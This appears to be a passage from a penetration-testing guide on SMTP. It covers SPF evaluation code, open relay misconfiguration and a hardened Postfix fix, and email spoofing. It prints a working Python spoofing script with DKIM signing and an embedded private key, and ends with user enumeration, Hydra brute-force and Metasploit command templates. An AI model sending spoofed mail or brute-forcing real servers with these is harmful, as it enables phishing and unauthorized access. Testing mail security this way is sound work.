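# the dig output above; strict.example and alias.example are made-up fixtures.
TXT_RECORDS = {
    "google.com": "v=spf1 include:_spf.google.com ~all",
    "_spf.google.com": "v=spf1 include:_netblocks.google.com "
                       "include:_netblocks2.google.com include:_netblocks3.google.com ~all",
    "_netblocks.google.com": "v=spf1 ip4:35.190.247.0/24 ip4:64.233.160.0/19 ip4:66.102.0.0/20 "
                             "ip4:66.249.80.0/20 ip4:72.14.192.0/18 ip4:74.125.0.0/16 ip4:108.177.8.0/21 "
                             "ip4:173.194.0.0/16 ip4:209.85.128.0/17 ip4:216.58.192.0/19 ip4:216.239.32.0/19 ~all",
    "_netblocks2.google.com": "v=spf1 ip6:2001:4860:4000::/36 ip6:2404:6800:4000::/36 ip6:2607:f8b0:4000::/36 "
                              "ip6:2800:3f0:4000::/36 ip6:2a00:1450:4000::/36 ip6:2c0f:fb50:4000::/36 ~all",
    "_netblocks3.google.com": "v=spf1 ip4:172.217.0.0/19 ip4:172.217.32.0/20 ip4:172.217.128.0/19 "
                              "ip4:172.217.160.0/20 ip4:172.217.192.0/19 ip4:172.253.56.0/21 ip4:172.253.112.0/20 "
                              "ip4:108.177.96.0/19 ip4:35.191.0.0/16 ip4:130.211.0.0/22 ~all",
    "strict.example": "v=spf1 ip4:203.0.113.0/24 -all",
    "alias.example": "v=spf1 redirect=strict.example",
}

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def check_spf(domain, client_ip, depth=0):
    """Evaluate the SPF policy of `domain` for the connecting `client_ip`.
    Implements ip4, ip6, include:, redirect= and all with their qualifiers;
    a, mx, ptr and exists would need further DNS lookups and are skipped.
    Returns pass / fail / softfail / neutral, or none if the domain has no
    record (deliberately no fallback to the parent domain)."""
    if depth > 10:  # guard against include/redirect loops (RFC 7208 caps lookups at 10)
        return "permerror"
    record = TXT_RECORDS.get(domain.lower().rstrip("."))
    if record is None or not record.startswith("v=spf1"):
        return "none"
    ip = ipaddress.ip_address(client_ip)
    redirect = None
    for term in record.split()[1:]:
        if term.lower().startswith("redirect="):
            redirect = term.split("=", 1)[1]  # only consulted if nothing matches
            continue
        qualifier = term[0] if term[0] in QUALIFIERS else "+"
        name, _, arg = term.lstrip("+-~?").partition(":")
        name = name.lower()
        if name in ("ip4", "ip6"):
            net = ipaddress.ip_network(arg, strict=False)
            matched = ip.version == net.version and ip in net
        elif name == "include":
            # include: matches only when the referenced policy yields pass
            matched = check_spf(arg, client_ip, depth + 1) == "pass"
        elif name == "all":
            matched = True
        else:
            matched = False  # unsupported mechanism or a modifier such as exp=
        if matched:
            return QUALIFIERS[qualifier]
    if redirect:
        return check_spf(redirect, client_ip, depth + 1)
    return "neutral"
```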

### Open Relay

When emails are sent, ensuring they don't get flagged as spam is crucial. This is often achieved through the use of a relay server that is trusted by the recipient. However, a common challenge is that administrators might not be fully aware of which IP ranges are safe to allow. This lack of understanding can lead to mistakes in setting up the SMTP server, a risk frequently identified in security assessments.

A workaround that some administrators use to avoid email delivery issues, especially concerning communications with potential or ongoing clients, is to allow connections from any IP address. This is done by configuring the SMTP server's mynetworks parameter to accept all IP addresses, as shown below:

```
mynetworks = 0.0.0.0/0
```
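For contrast, an added Postfix `main.cf` fragment (not from the page) with the same parameter restricted to loopback, and relaying additionally gated by `smtpd_relay_restrictions` so that only trusted networks and authenticated clients can send to external domains.

```ini
# Open relay: every client on the Internet is treated as "mynetworks"
# and may relay to any destination (the weak setting shown above).
# mynetworks = 0.0.0.0/0

# Hardened: only loopback is trusted. Other clients must authenticate
# (SASL) to relay; anything else may only deliver to domains this
# server is responsible for, so it cannot be used as an open relay.
mynetworks = 127.0.0.0/8 [::1]/128
smtpd_relay_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_unauth_destination
```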


To check whether the server relays mail from arbitrary senders to external recipients (the open relay condition described above), the nmap `smtp-open-relay` script can be used:

```bash
nmap -p25 --script smtp-open-relay 10.10.10.10 -v
```

## Tools

### Send Spoof Email

Or you could use a tool:

```bash
# This will send a test email from test@victim.com to destination@gmail.com
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com
# But you can also modify more options of the email
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com --subject TEST --sender administrator@victim.com
```

{% hint style="warning" %}
If the dkim python lib throws an error while parsing the key, you can use the following one.

**NOTE: This is just a dirty fix to do quick checks in cases where, for some reason, the openssl private key cannot be parsed by dkim.**

```
-----BEGIN RSA PRIVATE KEY-----
MIICXgIBAAKBgQDdkohAIWT6mXiHpfAHF8bv2vHTDboN2dl5pZKG5ZSHCYC5Z1bt
spr6chlrPUX71hfSkk8WxnJ1iC9Moa9sRzdjBrxPMjRDgP8p8AFdpugP5rJJXExO
pkZcdNPvCXGYNYD86Gpous6ubn6KhUWwDD1bw2UFu53nW/AK/EE4/jeraQIDAQAB
AoGAe31lrsht7TWH9aJISsu3torCaKyn23xlNuVO6xwdUb28Hpk327bFpXveKuS1
koxaLqQYrEriFBtYsU8T5Dc06FQAVLpUBOn+9PcKlxPBCLvUF+/KbfHF0q1QbeZR
fgr+E+fPxwVPxxk3i1AwCP4Cp1+bz2s58wZXlDBkWZ2YJwECQQD/f4bO2lnJz9Mq
1xsL3PqHlzIKh+W+yiGmQAELbgOdX4uCxMxjs5lwGSACMH2nUwXx+05RB8EM2m+j
ZBTeqxDxAkEA3gHyUtVenuTGClgYpiwefaTbGfYadh0z2KmiVcRqWzz3hDUEWxhc
GNtFT8wzLcmRHB4SQYUaS0Df9mpvwvdB+QJBALGv9Qci39L0j/15P7wOYMWvpwOf
422+kYxXcuKKDkWCTzoQt7yXCRzmvFYJdznJCZdymNLNu7q+p2lQjxsUiWECQQCI
Ms2FP91ywYs1oWJN39c84byBKtiFCdla3Ib48y0EmFyJQTVQ5ZrqrOrSz8W+G2Do
zRIKHCxLapt7w0SZabORAkEAxvm5pd2MNVqrqMJHbukHY1yBqwm5zVIYr75eiIDP
K9B7U1w0CJFUk6+4Qutr2ROqKtNOff9KuNRLAOiAzH3ZbQ==
-----END RSA PRIVATE KEY-----
```
{% endhint %}

**Or you can do it manually:**

{% tabs %}
{% tab title="PHP" %}
```php
<?php
// This will send an unsigned message
mail("your_email@gmail.com", "Test Subject!", "hey! This is a test", "From: administrator@victim.com");
```
{% endtab %}

{% tab title="Python" %}
```python
# Code from https://github.com/magichk/magicspoofing/blob/main/magicspoofmail.py

import os
import dkim #pip3 install dkimpy
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

# Set params
destination="destination@gmail.com"
sender="administrator@victim.com"
subject="Test"
message_html="""
<html>
<body>
<h3>This is a test, not a scam</h3>
<br />
</body>
</html>
"""
sender_domain=sender.split("@")[1]

# Prepare postfix
os.system("sudo sed -ri 's/(myhostname) = (.*)/\\1 = "+sender_domain+"/g' /etc/postfix/main.cf")
os.system("systemctl restart postfix")

# Generate DKIM keys
dkim_private_key_path="dkimprivatekey.pem"
os.system(f"openssl genrsa -out {dkim_private_key_path} 1024 2> /dev/null")
with open(dkim_private_key_path) as fh:
    dkim_private_key = fh.read()

# Generate email
msg = MIMEMultipart("alternative")
msg.attach(MIMEText(message_html, "html"))
msg["To"] = destination
msg["From"] = sender
msg["Subject"] = subject
headers = [b"To", b"From", b"Subject"]
msg_data = msg.as_bytes()

# Sign email with dkim
## The receiver won't be able to check it, but the email will appear as signed (and therefore, more trusted)
dkim_selector="s1"
sig = dkim.sign(message=msg_data,selector=str(dkim_selector).encode(),domain=sender_domain.encode(),privkey=dkim_private_key.encode(),include_headers=headers)
msg["DKIM-Signature"] = sig[len("DKIM-Signature: ") :].decode()
msg_data = msg.as_bytes()

# Use local postfix relay to send email
smtp="127.0.0.1"
s = smtplib.SMTP(smtp)
s.sendmail(sender, [destination], msg_data)
```
{% endtab %}
{% endtabs %}

### More info

Find more information about these protections in https://seanthegeek.net/459/demystifying-dmarc/

### Other phishing indicators

* Domains age
* Links pointing to IP addresses
* Link manipulation techniques
* Suspicious (uncommon) attachments
* Broken email content
* Values used that are different to those of the mail headers
* Existence of a valid and trusted SSL certificate
* Submission of the page to web content filtering sites

## Exfiltration through SMTP

If you can send data via SMTP read this.

## Config file

### Postfix

Usually, if installed, `/etc/postfix/master.cf` contains scripts to execute when, for example, a new mail is received by a user. For example, the line `flags=Rq user=mark argv=/etc/postfix/filtering -f ${sender} -- ${recipient}` means that `/etc/postfix/filtering` will be executed if a new mail is received by the user mark.

Other config files:

```
sendmail.cf
submit.cf
```

## HackTricks Automatic Commands

```
Protocol_Name: SMTP    #Protocol Abbreviation if there is one.
Port_Number:  25,465,587     #Comma separated if there is more than one.
Protocol_Description: Simple Mail Transfer Protocol          #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for SMTP
Note: |
SMTP (Simple Mail Transfer Protocol) is a TCP/IP protocol used in sending and receiving e-mail. However, since it is limited in its ability to queue messages at the receiving end, it is usually used with one of two other protocols, POP3 or IMAP, that let the user save messages in a server mailbox and download them periodically from the server.

https://book.hacktricks.xyz/pentesting/pentesting-smtp

Entry_2:
Name: Banner Grab
Description: Grab SMTP Banner
Command: nc -vn {IP} 25

Entry_3:
Name: SMTP Vuln Scan
Description: SMTP Vuln Scan With Nmap
Command: nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 {IP}

Entry_4:
Name: SMTP User Enum
Description: Enumerate users with smtp-user-enum
Command: smtp-user-enum -M VRFY -U {Big_Userlist} -t {IP}

Entry_5:
Name: SMTPS Connect
Description: Attempt to connect to SMTPS two different ways
Command: openssl s_client -crlf -connect {IP}:465 &&&& openssl s_client -starttls smtp -crlf -connect {IP}:587

Entry_6:
Name: Find MX Servers
Description: Find MX servers of an organization
Command: dig +short mx {Domain_Name}

Entry_7:
Name: Hydra Brute Force
Description: Need Nothing
Command: hydra -P {Big_Passwordlist} {IP} smtp -V

Entry_8:
Name: consolesless mfs enumeration
Description: SMTP enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_version; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_ntlm_domain; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_relay; set RHOSTS {IP}; set RPORT 25; run; exit'
```
